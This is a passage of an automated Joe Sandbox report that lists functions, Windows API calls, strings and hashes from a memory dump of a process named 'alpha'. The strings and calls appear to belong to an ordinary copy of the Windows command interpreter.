                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538177
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153819A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381BD
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381DC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D15381FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D153821A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsnicmp.MSVCRT ref: 00007FF7D1538239
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538291
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382D7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15382FB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153831A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538364
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF7D1538378
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D153839A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383AE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D15383E6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538403
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7D1538418
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3637805771-3100821235
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 2231802c5beab9bdd248c916e857ea9e4c0ad7af45889cd9912036ac3472a9aa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6E15B31B0865B8AF714AB62A80017DFAA1FB49B95BD48276DD1F537B0DFBCA405C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DPATH
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 95024817-2010427443
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f265ff26c7c94db9bffff594ef0a0d1e80106e717b9f263da8157f02c455b50f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA128132A0868B86FB64AF15A45017DFAA1FB89750FC44136EA5F477B5DFBCE4408B20
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1795611712-3662956551
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: fd2b9476af5b3282e010b4d465cfd375f84984d578800b47ea2b8ccd8163617a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCE1CE22E0864B86FB50AB64A8442BDE6A1FF48784FD04133E90F576B5DFBCE584C760
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _wcsupr.MSVCRT ref: 00007FF7D153EF33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EF98
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFA9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFBF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7D153EFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153EFED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F003
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F022
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F083
                                                                                                                                                                                                                                                                                                                                                                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F092
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F0A5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7D153F0DB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F135
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F16C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7D153E964), ref: 00007FF7D153F185
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15201B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1161012917-1690691951
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: daf80950beb1043322d9fa17f390b790dea28a53ca9d892c781e8040cd5e4b3a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E91AF22B0965B8AFB44BB60E8101BDBAA0AF49B54FD44137DE1F437B5DFBCA4458320
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1034426908-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 7d06bda58d5936ec44723525529da0c5511e0d0ed3408dbc22683ddf25e37914
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32F19E3260878B8AFB65EB21D8402ADB7A0FB45784FD14136DA4F476A5DFBCE584C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AA85
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AACF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7D153AAEC
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB39
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153AB6F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABA4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7D15398C0), ref: 00007FF7D153ABCB
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteValue$CreateOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %s=%s
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1019019434-1087296587
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8fb77bad9584ca93ec105d2df31bbd5af209357f67f98025750866cf4ee8d376
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5519331B0879B86F760BF25A45076EBA91FB89790FD44236CA4E837A0DFBDD4418710
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$FullNamePathwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4289998964-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: c9ece6f7e8188a989f984681316fe21f62332bd2af67ce3b7f9bcd36dcf999f9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f574b9b165fedc960487e474b398108792cb4fddced71d8a368933aba93db8fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6BC1AD22A0975F82FF95BB52954837DA2A0FF45B90FD15532CA0F077E1EFBCA4918260
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
• Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1280883635.00007FF7D1564000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.1281021522.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: %9d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1006866328-2241623522
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 01681a01fe61361d0aad856ab2a527bb2e8c347cf664452ba7c0c66cddef2146
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9514B72A1874B8AF700AF21D8501ACB7A0FB44764FC14636EA6B537B1CFBCE5458B60
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1280784059.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280765830.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1280883635.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
